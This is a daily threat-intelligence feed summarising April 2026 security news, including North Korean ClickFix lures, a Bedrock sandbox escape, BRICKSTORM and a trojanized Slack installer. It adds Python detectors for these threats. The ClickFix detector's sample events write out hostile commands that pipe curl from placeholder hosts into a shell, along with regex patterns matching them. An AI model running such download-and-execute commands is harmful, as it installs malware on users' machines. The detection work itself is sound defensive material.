Stay informed with today's critical security updates
Every organisation is different. The free "Daily Pulse" feed shows the broader threat landscape.
The Daily Pulse is refreshed automatically every day at 9:00 AM GMT.
Friday, April 17, 2026
Frontier AI advances from OpenAI and Anthropic are feeding into AI-native cyber defence products, such as SentinelOne's, which the vendor positions as operating at machine speed and global scale.
Integrating frontier models into detection and response is a real shift in capability, but it also puts a model in the decision loop. Organisations adopting these tools should know what telemetry the model sees, what actions it can take on its own, and how its decisions are reviewed; the defensive gain is only as good as that oversight.
Evaluate AI-native security tooling against your own telemetry and past incidents before adopting it, and define which automated actions require human approval.
Friday, April 17, 2026
North Korean threat actor Sapphire Sleet is running ClickFix campaigns against macOS users. ClickFix is a social-engineering technique rather than a malware family: lures such as fake job offers and fake Zoom update prompts instruct the victim to paste a command into Terminal, and that command fetches and runs malware built to steal credentials and sensitive information.
The campaign is aimed at professionals who can be reached through recruitment and meeting pretexts. Because the victim runs the command themselves, the download-and-open checks that Gatekeeper and notarisation enforce never apply, and a single stolen credential set can become the entry point for a broader incident.
Filter phishing at the mail gateway and train users that no legitimate update or interview process asks them to paste a command into Terminal. On the endpoint, alert on Terminal-spawned shells that pipe curl or wget output, or base64-decoded data, into sh or bash, and on osascript invocations that run shell scripts.
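The endpoint-side detection described above, as an added example (not code from the original page or from Microsoft's reporting on Sapphire Sleet). It scores process-creation events by the command-line shapes ClickFix lures rely on and only raises a finding when the parent is an interactive terminal, which is what separates a pasted command from the same one-liner run by legitimate automation. The sample events and their .example hostnames are constructed; the patterns are generic, not indicators from any specific campaign.

```python
import re
from dataclasses import dataclass

# Command-line shapes typical of ClickFix one-liners that a lure asks the victim to paste
# into Terminal. These are generic patterns, not indicators from any specific campaign.
_PATTERNS = [
    ("download-piped-to-shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b", re.I)),
    ("download-command-substitution",               # bash -c "$(curl ...)"
     re.compile(r"\$\(\s*(curl|wget)\b", re.I)),
    ("base64-decode-to-shell",                      # echo <blob> | base64 -d | sh
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b", re.I)),
    ("osascript-shell",                             # osascript -e 'do shell script "..."'
     re.compile(r"osascript\s+-e\s+.*do shell script", re.I)),
    ("quarantine-strip",                            # xattr -d com.apple.quarantine <app>
     re.compile(r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine", re.I)),
]

# Interactive terminals a human would paste the command into; a process tree rooted here
# is what separates ClickFix from legitimate automation running the same one-liners.
_TERMINALS = {"Terminal", "iTerm2", "Hyper", "Warp", "Alacritty", "kitty"}


@dataclass
class ProcEvent:
    parent: str    # parent process name as recorded by the EDR / Endpoint Security client
    cmdline: str   # full command line of the new process


def clickfix_matches(cmdline: str) -> list[str]:
    """Names of the ClickFix patterns the command line matches (empty list = clean)."""
    return [name for name, rx in _PATTERNS if rx.search(cmdline)]


def scan_events(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (event index, matched patterns) for events that look like a pasted ClickFix command."""
    findings = []
    for i, ev in enumerate(events):
        hits = clickfix_matches(ev.cmdline)
        if hits and ev.parent in _TERMINALS:
            findings.append((i, hits))
    return findings


# Constructed sample events (hostnames are placeholders, not real indicators).
SAMPLE_EVENTS = [
    ProcEvent("Terminal", 'bash -c "$(curl -fsSL https://zoom-update.example/fix.sh)"'),
    ProcEvent("Terminal", "echo Y3VybCAtZnNTTCBodHRwczovL2pvYnMuZXhhbXBsZS9yLnNoIHwgYmFzaA== | base64 -d | sh"),
    ProcEvent("Terminal", "osascript -e 'do shell script \"curl -s https://jobs-portal.example/p | sh\"'"),
    ProcEvent("Terminal", "git pull origin main"),
    ProcEvent("launchd", "curl -s https://metrics.example/agent | sh"),   # same shape, not a pasted command
    ProcEvent("iTerm2", "xattr -d com.apple.quarantine ~/Downloads/ZoomUpdate.app && open ~/Downloads/ZoomUpdate.app"),
]

if __name__ == "__main__":
    for idx, hits in scan_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)} :: {SAMPLE_EVENTS[idx].cmdline}")
```

Developers do run curl-to-bash installers from a terminal, so in production add an allowlist of installer URLs you accept (or route terminal hits to a lower-severity queue) rather than loosening the patterns; the launchd-parented event in the sample shows why the parent check matters in the other direction.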
Friday, April 17, 2026
Unit 42 has identified critical vulnerabilities in the AWS Bedrock AgentCore sandbox, centred on DNS tunnelling and credential exposure, that an attacker can chain to escape the sandbox environment.
Credentials reachable from inside a sandbox give any code the agent runs a path into the wider AWS account, and DNS tunnelling gives that code an exfiltration channel that ordinary HTTP egress controls do not see. Organisations running agents on Bedrock should treat the sandbox boundary as a control that needs verifying, not assuming.
Review AgentCore deployments: confirm the sandbox only holds short-lived, narrowly scoped credentials, restrict DNS resolution from the sandbox to what the workload actually needs, and monitor for tunnelling patterns such as high query volume to a single domain, long high-entropy labels, a new subdomain on every query, and unusual record types (TXT, NULL).
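The DNS-tunnelling indicators listed above, turned into a small detector as an added example (not code from the original page or from Unit 42's research). It aggregates a query log per registered domain and flags the ones that trip the label-length, entropy, unique-subdomain and record-type checks. The query log is constructed inline; the tunnel chunks are synthetic labels with 36 distinct characters, standing in for base32-encoded data, and the .example / exfil-example.net names are placeholders.

```python
import math
from collections import defaultdict

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"
ODD_TYPES = {"TXT", "NULL"}          # record types tunnels favour for carrying data back


def shannon_entropy(s: str) -> float:
    """Bits per character of s; encoded payload chunks score far higher than hostnames."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    # Last two labels. Fine for a demo; real deployments should use the public suffix list
    # so that names under co.uk, com.au and similar are not split wrongly.
    parts = qname.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else qname


def parse_line(line: str):
    # Constructed log format: "<timestamp> <client> <qtype> <qname>"
    ts, client, qtype, qname = line.split()
    return ts, client, qtype.upper(), qname.rstrip(".").lower()


def analyse(lines, min_queries=8, label_threshold=30, entropy_threshold=3.5,
            unique_ratio=0.9, odd_type_ratio=0.5) -> dict[str, list[str]]:
    """Map each suspicious registered domain to the list of tunnelling indicators it tripped."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "ent": [], "max_label": 0, "odd": 0})
    for line in lines:
        _ts, _client, qtype, qname = parse_line(line)
        dom = registered_domain(qname)
        s = stats[dom]
        s["queries"] += 1
        if qtype in ODD_TYPES:
            s["odd"] += 1
        sub = qname[: -len(dom) - 1] if qname.endswith("." + dom) else ""
        if sub:
            s["subs"].add(sub)
            s["ent"].append(shannon_entropy(sub.replace(".", "")))
            s["max_label"] = max(s["max_label"], max(len(label) for label in sub.split(".")))
    findings = {}
    for dom, s in stats.items():
        if s["queries"] < min_queries:
            continue                       # too little traffic to judge
        reasons = []
        if s["max_label"] >= label_threshold:
            reasons.append("long-labels")
        if s["ent"] and sum(s["ent"]) / len(s["ent"]) >= entropy_threshold:
            reasons.append("high-entropy")
        if len(s["subs"]) / s["queries"] >= unique_ratio:
            reasons.append("unique-subdomains")   # a fresh name per query: data, not caching
        if s["odd"] / s["queries"] >= odd_type_ratio:
            reasons.append("odd-record-types")
        if reasons:
            findings[dom] = reasons
    return findings


def _tunnel_label(i: int) -> str:
    # Constructed stand-in for a base32-encoded data chunk: 36 distinct characters, so its
    # entropy is log2(36), about 5.2 bits/char, the range real encoded chunks land in.
    return ALPHABET[i:] + ALPHABET[:i]


# Constructed query log: ordinary traffic to example.com plus a simulated tunnel in which
# every query carries a chunk under c.exfil-example.net.
SAMPLE_LOG = [
    "2026-04-17T09:00:01Z 10.0.0.5 A www.example.com",
    "2026-04-17T09:00:02Z 10.0.0.5 AAAA www.example.com",
    "2026-04-17T09:00:03Z 10.0.0.5 A mail.example.com",
    "2026-04-17T09:00:04Z 10.0.0.7 A cdn.example.com",
    "2026-04-17T09:00:05Z 10.0.0.7 A api.example.com",
    "2026-04-17T09:00:06Z 10.0.0.7 A api.example.com",
    "2026-04-17T09:00:07Z 10.0.0.8 A www.example.com",
    "2026-04-17T09:00:08Z 10.0.0.8 A mail.example.com",
    "2026-04-17T09:00:09Z 10.0.0.8 A cdn.example.com",
    "2026-04-17T09:00:10Z 10.0.0.8 A api.example.com",
] + [
    f"2026-04-17T09:01:{i:02d}Z 10.0.0.9 TXT {_tunnel_label(i)}.c.exfil-example.net."
    for i in range(12)
]

if __name__ == "__main__":
    for dom, reasons in analyse(SAMPLE_LOG).items():
        print(f"{dom}: {', '.join(reasons)}")
```

The thresholds are starting points, not tuned values: CDNs and some telemetry agents legitimately produce many unique subdomains, so in practice require two or more indicators, or weight the record-type and label-length checks higher, before paging anyone.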
Friday, April 17, 2026
The BRICKSTORM malware targets the VMware vSphere ecosystem, specifically the vCenter Server Appliance (VCSA) and ESXi hypervisors, giving threat actors long-term persistence beneath the guest operating systems, where the endpoint agents running inside the VMs cannot see it. The intrusions exploit weak security architecture and identity-management design around the virtualisation layer, which is how they bypass traditional security measures.
Compromising the VCSA grants attackers administrative control over every managed ESXi host and virtual machine, so data exfiltration and operational disruption become a matter of choice rather than effort. Organisations running vSphere should treat this as a Tier-0 compromise scenario, especially where critical infrastructure or sensitive workloads are virtualised.
Run the Mandiant vCenter Hardening Script to enforce security configurations at the Photon Linux layer of the VCSA, and treat the vCenter and ESXi management interfaces as Tier-0 assets: isolate them on a management network, require MFA for vCenter administrator accounts, and forward VCSA and ESXi logs to a SIEM so that persistence at that layer is at least visible.
Friday, April 17, 2026
The UK has designated Xinbi Guarantee an enabler of crypto scams and human trafficking, yet Telegram continues to host the marketplace without acting against it. Its continued presence raises questions about the platform's role in facilitating illicit activity.
Leaving Xinbi Guarantee in place lets the scams it underwrites keep running, with financial losses for victims and a laundering channel for the proceeds. For security teams the lesson is that widely used messaging platforms can double as criminal marketplaces that the platform operator will not necessarily police.
Security and fraud teams should treat Telegram-hosted guarantee marketplaces as scam infrastructure when investigating crypto-related fraud, and brief finance and payments staff on the pattern.
Friday, April 17, 2026
A trojanized Slack installer, distributed as a lookalike download, gives attackers remote access to the victim's desktop while appearing to install the legitimate application. That access is then used to steal credentials and sensitive data.
The attack puts both individuals and organisations at risk of account takeover and data loss, and it is likely to spread widely because users trust the Slack brand and routinely install it themselves.
Allow installs only from the vendor's official domain, verify code signatures and publisher identity before execution, pin hashes for approved installer versions, and alert on installers launched from user download directories that fail signature checks.
Friday, April 17, 2026
A large-scale malvertising campaign detected by Microsoft in December 2024 affected nearly one million devices worldwide. It originated on illegal streaming websites that used malvertising redirectors to deliver initial-access payloads hosted on GitHub, the first stage of a modular, multi-stage attack chain.
The campaign shows how much reach a redirector chain can have: anyone visiting the streaming sites could be funnelled to the payload, and the later stages were built to steal information from the infected device. The scale, and the use of a trusted code-hosting site for the payload, are what should concern security teams.
Block known redirector and illegal-streaming domains at the proxy, restrict executable downloads from code-hosting sites on endpoints that have no developer need for them, and alert on browser downloads that are immediately followed by script execution.
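Both the trojanized Slack installer and the GitHub-hosted malvertising payload are executable downloads whose origin does not match what the file claims to be, so one proxy-log check serves both items. This is an added example, not code from the original page, from Microsoft's report or from Slack. The log lines are constructed; the .example hostnames are placeholders; and the OFFICIAL_HOSTS map is an assumption to be checked against the vendor's own documentation before use.

```python
import posixpath
from urllib.parse import urlsplit

EXEC_EXTS = {".exe", ".msi", ".msix", ".dmg", ".pkg"}
EXEC_TYPES = {"application/x-msdownload", "application/x-msi",
              "application/x-apple-diskimage", "application/vnd.apple.installer+xml"}
CODE_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}
# Assumed official download hosts per product. Verify each against the vendor's documentation
# before relying on it; this map is an example, not a vetted allowlist.
OFFICIAL_HOSTS = {"slack": {"slack.com", "downloads.slack-edge.com"}}


def parse_line(line: str) -> dict:
    # Constructed log format: "<timestamp> <client> <url> <referer or -> <content-type>"
    ts, client, url, referer, ctype = line.split()
    return {"ts": ts, "client": client, "url": url,
            "referer": "" if referer == "-" else referer, "ctype": ctype.lower()}


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def is_executable(url: str, ctype: str) -> bool:
    ext = posixpath.splitext(urlsplit(url).path)[1].lower()
    return ext in EXEC_EXTS or ctype.lower() in EXEC_TYPES


def classify(rec: dict) -> list[str]:
    """Reasons an executable download looks like a trojanized installer or a malvertising payload."""
    if not is_executable(rec["url"], rec["ctype"]):
        return []
    host = host_of(rec["url"])
    ref_host = host_of(rec["referer"])
    fname = posixpath.basename(urlsplit(rec["url"]).path).lower()
    reasons = []
    # An installer named after a product but served from a host that is not the vendor's
    for product, hosts in OFFICIAL_HOSTS.items():
        if product in fname and host not in hosts:
            reasons.append(f"installer-host-not-official:{product}")
    # A binary on a code-hosting site reached from somewhere other than that site: the shape
    # of a redirector chain landing on a GitHub-hosted payload
    if host in CODE_HOSTS and ref_host and ref_host not in CODE_HOSTS:
        reasons.append("code-host-payload-via-external-referer")
    return reasons


def scan_downloads(lines) -> list[tuple[int, list[str]]]:
    """(line index, reasons) for every download worth a second look."""
    out = []
    for i, line in enumerate(lines):
        reasons = classify(parse_line(line))
        if reasons:
            out.append((i, reasons))
    return out


# Constructed proxy log: a genuine Slack download, a lookalike-host installer, a GitHub-hosted
# binary reached from a streaming site, a GitHub release fetched from GitHub itself, and a page.
SAMPLE_LOG = [
    "2026-04-17T10:01:05Z 10.0.1.12 https://downloads.slack-edge.com/releases/SlackSetup.exe https://slack.com/downloads/windows application/x-msdownload",
    "2026-04-17T10:02:11Z 10.0.1.12 https://slack-desktop-download.example/SlackSetup.exe https://slack-desktop-download.example/ application/x-msdownload",
    "2026-04-17T10:03:40Z 10.0.1.30 https://github.com/example-user/example-repo/releases/download/v1/Setup.exe https://free-stream.example/watch/12345 application/octet-stream",
    "2026-04-17T10:04:02Z 10.0.1.31 https://github.com/example-org/example-tool/releases/download/v2.0.0/example-tool.msi https://github.com/example-org/example-tool/releases application/octet-stream",
    "2026-04-17T10:05:00Z 10.0.1.31 https://www.example.com/index.html - text/html",
]

if __name__ == "__main__":
    for idx, reasons in scan_downloads(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(reasons)} :: {SAMPLE_LOG[idx].split()[2]}")
```

The referer check is deliberately narrow: a GitHub release fetched from a GitHub page is normal developer traffic, while the same file reached from a streaming site is the chain Microsoft described. Proxy logs often lack a referer after a cross-site redirect, so pair this with blocking at the redirector domains rather than relying on it alone.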
Friday, April 17, 2026
Unit 42 reports a rise in attacks on Kubernetes environments, with threat actors abusing identities (service-account tokens, over-privileged RBAC bindings, leaked cloud credentials) and exploiting critical vulnerabilities to gain unauthorised access to cloud infrastructure.
For organisations that run production workloads on Kubernetes, a compromised cluster identity can mean access to secrets, lateral movement into the cloud account, and disruption of the services the cluster hosts. Security teams should expect identity misuse to be the more common path, since it needs no exploit.
Enforce least-privilege RBAC (no wildcard verbs or resources, no cluster-admin bound to service accounts or broad groups), disable automatic mounting of service-account tokens for workloads that do not call the API, rotate any exposed credentials, and patch the control plane and add-ons promptly for the vulnerabilities being exploited.
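The RBAC review recommended above, as an added example (not code from the original page or from Unit 42). It takes Role/ClusterRole and binding objects in the dictionary shape kubectl get -o json returns and reports rules that grant more than a workload normally needs, then the subjects bound to them. The sample objects are constructed; the namespace and account names are placeholders.

```python
BROAD_GROUPS = {"system:authenticated", "system:unauthenticated", "system:serviceaccounts"}

# Rule shapes that hand out more than a workload normally needs. Each predicate takes one
# RBAC rule dict ({"apiGroups": [...], "resources": [...], "verbs": [...]}).
RISKY_RULES = [
    ("wildcard-verb",      lambda r: "*" in r.get("verbs", [])),
    ("wildcard-resource",  lambda r: "*" in r.get("resources", [])),
    ("read-secrets",       lambda r: "secrets" in r.get("resources", [])
                                     and {"get", "list", "watch"} & set(r.get("verbs", []))),
    ("pod-exec",           lambda r: "pods/exec" in r.get("resources", [])
                                     and "create" in r.get("verbs", [])),
    ("create-pods",        lambda r: "pods" in r.get("resources", [])
                                     and "create" in r.get("verbs", [])),   # hostPath, SA token mounts
    ("mint-sa-tokens",     lambda r: "serviceaccounts/token" in r.get("resources", [])
                                     and "create" in r.get("verbs", [])),
    ("escalation-verbs",   lambda r: {"bind", "escalate", "impersonate"} & set(r.get("verbs", []))),
]


def role_key(kind: str, name: str, namespace=None) -> str:
    return f"{kind}/{namespace}/{name}" if kind == "Role" else f"{kind}/{name}"


def audit_roles(roles) -> dict[str, list[str]]:
    """Map each Role/ClusterRole that grants a risky permission to the reasons why."""
    findings = {}
    for role in roles:
        md = role["metadata"]
        reasons = []
        for rule in role.get("rules", []):
            for name, risky in RISKY_RULES:
                if risky(rule) and name not in reasons:
                    reasons.append(name)
        if reasons:
            findings[role_key(role["kind"], md["name"], md.get("namespace"))] = reasons
    return findings


def subject_str(subj) -> str:
    if subj["kind"] == "ServiceAccount":
        return f"ServiceAccount {subj.get('namespace', '')}/{subj['name']}"
    return f"{subj['kind']} {subj['name']}"


def audit_bindings(bindings, role_findings) -> list[tuple[str, str, list[str]]]:
    """(binding, subject, reasons) for every subject bound to a risky role or to cluster-admin."""
    out = []
    for b in bindings:
        ref = b["roleRef"]
        # A RoleBinding may reference a ClusterRole; the grant is then scoped to the binding's namespace
        key = role_key(ref["kind"], ref["name"], b["metadata"].get("namespace"))
        base = list(role_findings.get(key, []))
        if ref["kind"] == "ClusterRole" and ref["name"] == "cluster-admin":
            base.insert(0, "cluster-admin")
        if not base:
            continue
        for subj in b.get("subjects", []):
            reasons = list(base)
            if subj["kind"] == "ServiceAccount":
                reasons.append("bound-to-service-account")
                if subj["name"] == "default":
                    reasons.append("bound-to-default-service-account")
            elif subj["kind"] == "Group" and subj["name"] in BROAD_GROUPS:
                reasons.append("bound-to-broad-group")
            out.append((b["metadata"]["name"], subject_str(subj), reasons))
    return out


# Constructed objects in the shape of `kubectl get clusterroles,roles,... -o json` items.
SAMPLE_ROLES = [
    {"kind": "ClusterRole", "metadata": {"name": "ci-deployer"},
     "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["get", "list", "update", "patch"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "debug-everything"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "Role", "metadata": {"name": "app-reader", "namespace": "payments"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/log", "secrets"], "verbs": ["get", "list"]}]},
    {"kind": "Role", "metadata": {"name": "ops-shell", "namespace": "payments"},
     "rules": [{"apiGroups": [""], "resources": ["pods/exec"], "verbs": ["create"]}]},
]
SAMPLE_BINDINGS = [
    {"kind": "ClusterRoleBinding", "metadata": {"name": "ci-bot"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "ci-bot", "namespace": "ci"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "debug"},
     "roleRef": {"kind": "ClusterRole", "name": "debug-everything"},
     "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
    {"kind": "RoleBinding", "metadata": {"name": "reader", "namespace": "payments"},
     "roleRef": {"kind": "Role", "name": "app-reader"},
     "subjects": [{"kind": "ServiceAccount", "name": "default", "namespace": "payments"}]},
    {"kind": "ClusterRoleBinding", "metadata": {"name": "deployer"},
     "roleRef": {"kind": "ClusterRole", "name": "ci-deployer"},
     "subjects": [{"kind": "ServiceAccount", "name": "deployer", "namespace": "ci"}]},
]

if __name__ == "__main__":
    role_findings = audit_roles(SAMPLE_ROLES)
    for key, reasons in role_findings.items():
        print(f"{key}: {', '.join(reasons)}")
    for binding, subject, reasons in audit_bindings(SAMPLE_BINDINGS, role_findings):
        print(f"{binding} -> {subject}: {', '.join(reasons)}")
```

The deployer binding produces no finding even though it is a service account, which is the point: the risk is in what the role grants, and a tightly scoped ClusterRole bound to a service account is fine. The "default" service-account case is called out separately because every pod in the namespace without an explicit serviceAccountName inherits it.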
Friday, April 17, 2026
Internal emails indicate that a conservative legal group has been orchestrating complaints against media figures, specifically targeting Jimmy Kimmel and his team, leveraging connections with FCC chairman Brendan Carr's office.
This situation highlights the potential for politically motivated attacks against individuals in the media, which can lead to increased censorship and suppression of free speech. Security teams should be aware of how such threats can evolve and affect their organization's reputation and operational security.
Implement monitoring for politically motivated harassment or threats against employees, and establish protocols for responding to such incidents.
Friday, April 17, 2026
Browser Guard now includes Access Control for managing site permissions: users can specify which websites may use the camera, microphone and location, and which may send notifications.
Permission prompts are a routine abuse surface (notification spam, location tracking, sites requesting the camera or microphone with no legitimate need), so a per-site allow list reduces a user's exposure to malicious websites. The protection only holds if the list stays tight, so security teams should expect to guide users on what to grant.
Encourage users to review and tighten their browser permissions regularly to safeguard against unwanted access to sensitive information.